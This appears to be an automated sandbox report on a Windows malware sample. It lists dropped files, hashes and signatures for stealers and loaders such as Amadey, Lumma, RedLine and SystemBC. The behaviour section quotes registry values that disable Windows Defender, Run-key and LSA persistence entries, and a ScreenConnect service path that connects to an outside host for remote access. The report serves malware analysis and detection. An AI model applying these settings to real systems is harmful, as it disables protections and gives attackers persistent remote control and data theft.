memory/3040-1762-0x0000000000400000-0x000000000087F000-memory.dmp

memory/2160-1848-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/5296-2037-0x00000000005A0000-0x00000000008B4000-memory.dmp

memory/5296-2038-0x00000000005A0000-0x00000000008B4000-memory.dmp

memory/676-2089-0x0000000000D60000-0x0000000001064000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8NE9NSMT\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe

MD5 06568713e112965fd80a012d760d1429
SHA1 d5dc1529bc3ba44691acb8839b10c3a2842e71a7
SHA256 48ced90364ac894177823f6b439dfd51e68846469861f14c6f76bbeee4647b6e
SHA512 97646dc2b83ce695fcc43871068e1248373a6255cc4f527ecd5c7544073ae4ff3ea22643acff7882a6562be34399e58e68e9e08be06c8ae6fdba6784014a5f45

memory/1724-2290-0x0000000000D30000-0x000000000195F000-memory.dmp

memory/5848-2340-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3040-2619-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3040-2637-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe

MD5 ab118fd9c6e1c3813ff0ec7cd8c6539f
SHA1 a03967883de5cfbe96036d13eac74bbb030903ef
SHA256 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad
SHA512 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297

memory/6104-2685-0x0000000000FA0000-0x0000000001008000-memory.dmp

memory/2116-2708-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2116-2706-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2160-2704-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/5296-2896-0x00000000005A0000-0x00000000008B4000-memory.dmp

memory/676-3000-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/5296-3098-0x00000000005A0000-0x00000000008B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe

MD5 75728febe161947937f82f0f36ad99f8
SHA1 d2b5a4970b73e03bd877b075bac0cdb3bfc510cf
SHA256 0a88c347a294b22b6d6554b711db339bca86c568863dec7844a2badec6ef4282
SHA512 7cfdf76b959895ae44abe4171662d9c6c28dfd444030d570fea0fa4f624adf226e35d655dd89b159a1e0d08bcd97dfe899c3646d7682aacf5f2dabfbdf3d9a67

memory/1012-3148-0x0000000000300000-0x000000000035C000-memory.dmp

memory/1156-3169-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1156-3163-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1724-3185-0x0000000000D30000-0x000000000195F000-memory.dmp

memory/1724-3190-0x0000000000D30000-0x000000000195F000-memory.dmp

memory/5848-3192-0x0000000000400000-0x000000000087F000-memory.dmp

memory/4140-3194-0x0000000000680000-0x00000000006AF000-memory.dmp

memory/1724-3200-0x0000000000D30000-0x000000000195F000-memory.dmp

memory/4140-3199-0x0000000000680000-0x00000000006AF000-memory.dmp

memory/2160-3210-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/676-3222-0x0000000000D60000-0x0000000001064000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/4240-3241-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/4240-3243-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/5848-3244-0x0000000000400000-0x000000000087F000-memory.dmp

memory/676-3246-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/5376-3262-0x0000000000CA0000-0x000000000117E000-memory.dmp

memory/5376-3265-0x0000000000CA0000-0x000000000117E000-memory.dmp

memory/2160-3266-0x00000000009E0000-0x0000000000EBE000-memory.dmp

memory/5964-3285-0x0000000003020000-0x000000000307F000-memory.dmp

memory/2820-3291-0x000002CCD27D0000-0x000002CCD2822000-memory.dmp

memory/2820-3292-0x000002CCECAC0000-0x000002CCECBCA000-memory.dmp

memory/2820-3293-0x000002CCEC8E0000-0x000002CCEC8F2000-memory.dmp

memory/2820-3294-0x000002CCEC940000-0x000002CCEC97C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/1708-3314-0x0000000000650000-0x000000000067C000-memory.dmp

memory/2820-3326-0x000002CCECA00000-0x000002CCECA50000-memory.dmp

memory/2820-3328-0x000002CCECFA0000-0x000002CCED162000-memory.dmp

memory/2820-3329-0x000002CCED6A0000-0x000002CCEDBC8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/5316-3405-0x0000000000BE0000-0x0000000000D50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZKC1FSM4\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\scoped_dir4108_605833171\a37c839c-8e4a-477c-ae79-0d412d2e0526.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir4108_605833171\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 2cc69b3a97061d8f6b1f3c62216b6239
SHA1 114e0471cd2173084065f4560802dc1980e5a6f5
SHA256 8d9d54bad83e7fb3ad7fa71b793651ab5cef0613e35dd3ac59f52e381aeca350
SHA512 214044fc2cff9c8ad9531caade0ec7df4cd839bddfdafe57740e3ff903aba6762d49f8e70ac8cb6588c4decfb56d0a79a95ebd3c33c5e8869fe77fa964e3c8c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA1 c216daa71094da3ffa15c787c41b0bc7b32ed40b
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855
SHA512 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ba8b98ed-6b60-41d3-be84-e83cb1dbf8d9.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA1 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25
SHA512 7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ac4081a397b49cc8e13931dcbd4c0aad
SHA1 fd065f40d5eadc2601394fa54464919c6dc42341
SHA256 a11f96cc283531011fba6cbfe9cbfd23340273c78a386435b83271dd4a273341
SHA512 2ea332560b162abd47c47d552307c80161e638c85c5a426231f7d2cbfc7601ddc374021d119dadc8c3131dbcc85748a4e533be4fbd04ec25d94d0a4013ec1007

Analysis: behavioral15

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" N/A N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection N/A N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" N/A N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=[encoded value removed]&v=[encoded value removed]&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4284dc1285.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\4284dc1285.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c0fb027e93.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\c0fb027e93.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\325e33a3f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\325e33a3f3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a68f071a5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036510101\\a68f071a5f.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5052 set thread context of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 47720 set thread context of 47916 N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
